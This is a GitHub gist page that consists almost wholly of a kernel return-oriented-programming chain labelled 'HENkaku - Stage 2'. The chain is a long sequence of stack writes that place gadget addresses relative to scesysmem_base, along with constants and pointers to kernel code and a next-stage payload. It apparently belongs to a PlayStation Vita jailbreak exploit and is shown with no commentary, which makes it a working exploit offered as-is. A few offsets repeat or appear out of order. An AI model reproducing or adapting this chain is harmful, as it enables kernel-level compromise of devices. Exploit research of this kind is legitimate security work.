Skip to content

Instantly share code, notes, and snippets.

@hexkyz
Created October 19, 2016 19:12
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save hexkyz/37ad6295d48c10a127419c3ced9e4853 to your computer and use it in GitHub Desktop.
Save hexkyz/37ad6295d48c10a127419c3ced9e4853 to your computer and use it in GitHub Desktop.
HENkaku - Stage 2 (ROP chain)
0x00(x_stack + 0x00008A8C) = scesysmem_base + 0x00000031
0x00(x_stack + 0x00008A90) = 0x08106803
0x00(x_stack + 0x00008A94) = scesysmem_base + 0x0001EFF1
0x00(x_stack + 0x00008A98) = 0x00000038
0x00(x_stack + 0x00008A9C) = scesysmem_base + 0x0001EFE1
0x00(x_stack + 0x00008AA0) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008AA4) = scesysmem_base + 0x000039EB
0x00(x_stack + 0x00008AA8) = scesysmem_base + 0x0001B571
0x00(x_stack + 0x00008AAC) = 0x00000000
0x00(x_stack + 0x00008AB0) = scesysmem_base + 0x00001E43
0x00(x_stack + 0x00008AB4) = 0x00000000
0x00(x_stack + 0x00008AB8) = scesysmem_base + 0x0001FC6D
0x00(x_stack + 0x00008ABC) = scesysmem_base + 0x0000EA73
0x00(x_stack + 0x00008AC0) = scesysmem_base + 0x00000031
0x00(x_stack + 0x00008AC4) = scesysmem_base + 0x00027913
0x00(x_stack + 0x00008AC8) = scesysmem_base + 0x0000A523
0x00(x_stack + 0x00008ACC) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008AD0) = scesysmem_base + 0x00000CE3
0x00(x_stack + 0x00008AD4) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008AD8) = scesysmem_base + 0x0001F2B1
0x00(x_stack + 0x00008ADC) = scesysmem_base + 0x00000067
0x00(x_stack + 0x00008AE0) = scesysmem_base + 0x0000587F
0x00(x_stack + 0x00008AE4) = scesysmem_base + 0x00019713
0x00(x_stack + 0x00008AE8) = scesysmem_base + 0x00001605
0x00(x_stack + 0x00008AEC) = scesysmem_base + 0x00001E1D
0x00(x_stack + 0x00008AF0) = 0x00000000
0x00(x_stack + 0x00008AF4) = scesysmem_base + 0x0001EFE1
0x00(x_stack + 0x00008AF8) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008AFC) = scesysmem_base + 0x00001603
0x00(x_stack + 0x00008B00) = scesysmem_base + 0x0001F2B1
0x00(x_stack + 0x00008B04) = scesysmem_base + 0x00001F17
0x00(x_stack + 0x00008B08) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008B0C) = scesysmem_base + 0x00000031
0x00(x_stack + 0x00008B10) = scesysmem_base + 0x0000B913
0x00(x_stack + 0x00008B14) = scesysmem_base + 0x00023B61
0x00(x_stack + 0x00008B18) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008B1C) = scesysmem_base + 0x000039EB
0x00(x_stack + 0x00008B20) = scesysmem_base + 0x000232EB
0x00(x_stack + 0x00008B24) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008B28) = scesysmem_base + 0x0001B571
0x00(x_stack + 0x00008B2C) = scesysmem_base + 0x00023B61
0x00(x_stack + 0x00008B30) = scesysmem_base + 0x000232F1
0x00(x_stack + 0x00008B34) = scesysmem_base + 0x00001411
0x00(x_stack + 0x00008B38) = scesysmem_base + 0x00000AE1
0x00(x_stack + 0x00008B3C) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008B40) = scesysmem_base + 0x000050E9
0x00(x_stack + 0x00008B44) = scesysmem_base + 0x00001411
0x00(x_stack + 0x00008B48) = 0x00000090
0x00(x_stack + 0x00008B4C) = scesysmem_base + 0x0001F2B1
0x00(x_stack + 0x00008B50) = scesysmem_base + 0x00012B11
0x00(x_stack + 0x00008B54) = scesysmem_base + 0x00000CE3
0x00(x_stack + 0x00008B58) = scesysmem_base + 0x000000D1
0x00(x_stack + 0x00008B5C) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008B60) = scesysmem_base + 0x0001F2B1
0x00(x_stack + 0x00008B64) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008B68) = scesysmem_base + 0x000039EB
0x00(x_stack + 0x00008B6C) = scesysmem_base + 0x0001FDC5
0x00(x_stack + 0x00008B70) = scesysmem_base + 0x0001D8DB
0x00(x_stack + 0x00008B74) = scesysmem_base + 0x00019399
0x00(x_stack + 0x00008B78) = scesysmem_base + 0x00019399
0x00(x_stack + 0x00008B7C) = scesysmem_base + 0x00011C5F
0x00(x_stack + 0x00008B80) = scesysmem_base + 0x00019399
0x00(x_stack + 0x00008B84) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008B88) = scesysmem_base + 0x0000B913
0x00(x_stack + 0x00008B8C) = 0x00000000
0x00(x_stack + 0x00008B90) = scesysmem_base + 0x0001EFE1
0x00(x_stack + 0x00008B94) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008B98) = scesysmem_base + 0x00001861
0x00(x_stack + 0x00008B9C) = scesysmem_base + 0x0001FC6D
0x00(x_stack + 0x00008BA0) = scesysmem_base + 0x0001F2B1
0x00(x_stack + 0x00008BA4) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008BA8) = scesysmem_base + 0x000039EB
0x00(x_stack + 0x00008BAC) = scesysmem_base + 0x00019399
0x00(x_stack + 0x00008BB0) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008BB4) = scesysmem_base + 0x00019399
0x00(x_stack + 0x00008BB8) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008BBC) = scesysmem_base + 0x000039EB
0x00(x_stack + 0x00008BC0) = scesysmem_base + 0x0001614D
0x00(x_stack + 0x00008BC4) = scesysmem_base + 0x000233D3
0x00(x_stack + 0x00008BC8) = scesysmem_base + 0x0001F2B1
0x00(x_stack + 0x00008BCC) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008BD0) = scesysmem_base + 0x000000AF
0x00(x_stack + 0x00008BD4) = scesysmem_base + 0x00001605
0x00(x_stack + 0x00008BD8) = scesysmem_base + 0x0001EFE1
0x00(x_stack + 0x00008BDC) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008BE0) = scesysmem_base + 0x000050E9
0x00(x_stack + 0x00008BE4) = scesysmem_base + 0x000039EB
0x00(x_stack + 0x00008BE8) = scesysmem_base + 0x00001347
0x00(x_stack + 0x00008BEC) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008BF0) = scesysmem_base + 0x000000B9
0x00(x_stack + 0x00008BF4) = scesysmem_base + 0x0001F2B1
0x00(x_stack + 0x00008BF8) = scesysmem_base + 0x00001347
0x00(x_stack + 0x00008BFC) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008C00) = scesysmem_base + 0x0000039B
0x00(x_stack + 0x00008C04) = kern_code
0x00(x_stack + 0x00008C08) = scesysmem_base + 0x0001CB95
0x00(x_stack + 0x00008C0C) = scesysmem_base + 0x0001EA93
0x00(x_stack + 0x00008C10) = scesysmem_base + 0x00001411
0x00(x_stack + 0x00008C14) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008C18) = scesysmem_base + 0x000209D7
0x00(x_stack + 0x00008C1C) = scesysmem_base + 0x000209D3
0x00(x_stack + 0x00008C20) = scesysmem_base + 0x00001411
0x00(x_stack + 0x00008C24) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008C28) = scesysmem_base + 0x0001BAF5
0x00(x_stack + 0x00008C2C) = scesysmem_base + 0x00001605
0x00(x_stack + 0x00008C30) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008C34) = scesysmem_base + 0x0000652B
0x00(x_stack + 0x00008C38) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008C3C) = scesysmem_base + 0x0001BAF5
0x00(x_stack + 0x00008C40) = scesysmem_base + 0x00022A49
0x00(x_stack + 0x00008C44) = 0xFFFFFEB0
0x00(x_stack + 0x00008C48) = scesysmem_base + 0x0000039B
0x00(x_stack + 0x00008C5C) = 0x00000040
0x00(x_stack + 0x00008C50) = scesysmem_base + 0x00022A49
0x00(x_stack + 0x00008C54) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008C58) = scesysmem_base + 0x0000652B
0x00(x_stack + 0x00008C6C) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008C60) = scesysmem_base + 0x0000039B
0x00(x_stack + 0x00008C64) = 0x00000040
0x00(x_stack + 0x00008C68) = scesysmem_base + 0x00001605
0x00(x_stack + 0x00008C6C) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008C70) = scesysmem_base + 0x0001D9EB
0x00(x_stack + 0x00008C74) = scesysmem_base + 0x000039EB
0x00(x_stack + 0x00008C78) = scesysmem_base + 0x00000853
0x00(x_stack + 0x00008C7C) = scesysmem_base + 0x0001D8DB
0x00(x_stack + 0x00008C80) = 0x00000038
0x00(x_stack + 0x00008C84) = scesysmem_base + 0x000000AB
0x00(x_stack + 0x00008C88) = scesysmem_base + 0x000000D1
0x00(x_stack + 0x00008C8C) = scesysmem_base + 0x0002328B
0x00(x_stack + 0x00008C90) = scesysmem_base + 0x00022FCD
0x00(x_stack + 0x00008C94) = scesysmem_base + 0x000000D1
0x00(x_stack + 0x00008C98) = scesysmem_base + 0x0001EFF1
0x00(x_stack + 0x00008C9C) = scesysmem_base + 0x0002A117
0x00(x_stack + 0x00008CA0) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008CA4) = scesysmem_base + 0x00001605
0x00(x_stack + 0x00008CA8) = scesysmem_base + 0x00019399
0x00(x_stack + 0x00008CAC) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008CB0) = scesysmem_base + 0x000039EB
0x00(x_stack + 0x00008CB4) = scesysmem_base + 0x0001BF1F
0x00(x_stack + 0x00008CB8) = 0xFFFFFEB0
0x00(x_stack + 0x00008CBC) = scesysmem_base + 0x0000039B
0x00(x_stack + 0x00008CC0) = 0x00000240
0x00(x_stack + 0x00008CC4) = scesysmem_base + 0x00022A49
0x00(x_stack + 0x00008CC8) = scesysmem_base + 0x000039EB
0x00(x_stack + 0x00008CCC) = scesysmem_base + 0x00003D73
0x00(x_stack + 0x00008CD0) = 0x00000000
0x00(x_stack + 0x00008CD4) = scesysmem_base + 0x000021FD
0x00(x_stack + 0x00008CD8) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008CDC) = scesysmem_base + 0x000050E9
0x00(x_stack + 0x00008CE0) = scesysmem_base + 0x00000AE1
0x00(x_stack + 0x00008CE4) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008CE8) = scesysmem_base + 0x0002A117
0x00(x_stack + 0x00008CEC) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008CF0) = scesysmem_base + 0x0001F2B1
0x00(x_stack + 0x00008CF4) = scesysmem_base + 0x00000067
0x00(x_stack + 0x00008CF8) = scesysmem_base + 0x000039EB
0x00(x_stack + 0x00008CFC) = scesysmem_base + 0x0001BF47
0x00(x_stack + 0x00008D00) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008D04) = scesysmem_base + 0x000050E9
0x00(x_stack + 0x00008D08) = scesysmem_base + 0x0000AF33
0x00(x_stack + 0x00008D0C) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008D10) = scesysmem_base + 0x0001D9EB
0x00(x_stack + 0x00008D14) = kern_next_payload
0x00(x_stack + 0x00008D18) = scesysmem_base + 0x0001FC6D
0x00(x_stack + 0x00008D1C) = scesysmem_base + 0x0000EA73
0x00(x_stack + 0x00008D20) = scesysmem_base + 0x0000039B
0x00(x_stack + 0x00008D24) = scesysmem_base + 0x00000853
0x00(x_stack + 0x00008D28) = 0xFFFFFFFF
0x00(x_stack + 0x00008D2C) = 0x08106803
0x00(x_stack + 0x00008D30) = scesysmem_base + 0x000233D3
0x00(x_stack + 0x00008D34) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008D38) = scesysmem_base + 0x00000433
0x00(x_stack + 0x00008D3C) = scesysmem_base + 0x000233D3
0x00(x_stack + 0x00008D40) = scesysmem_base + 0x000150A3
0x00(x_stack + 0x00008D44) = 0x00000000
0x00(x_stack + 0x00008D48) = scesysmem_base + 0x0000A74D
0x00(x_stack + 0x00008D4C) = scesysmem_base + 0x00000000
0x00(x_stack + 0x00008D50) = scesysmem_base + 0x00000853
0x00(x_stack + 0x00008D54) = scesysmem_base + 0x0001BF1F
0x00(x_stack + 0x00008D58) = 0x00000200
0x00(x_stack + 0x00008D5C) = scesysmem_base + 0x00001605
0x00(x_stack + 0x00008D60) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008D64) = scesysmem_base + 0x000050E9
0x00(x_stack + 0x00008D68) = scesysmem_base + 0x00001605
0x00(x_stack + 0x00008D6C) = scesysmem_base + 0x00022FCD
0x00(x_stack + 0x00008D70) = scesysmem_base + 0x000039EB
0x00(x_stack + 0x00008D74) = scesysmem_base + 0x00000853
0x00(x_stack + 0x00008D78) = scesysmem_base + 0x00011C5F
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment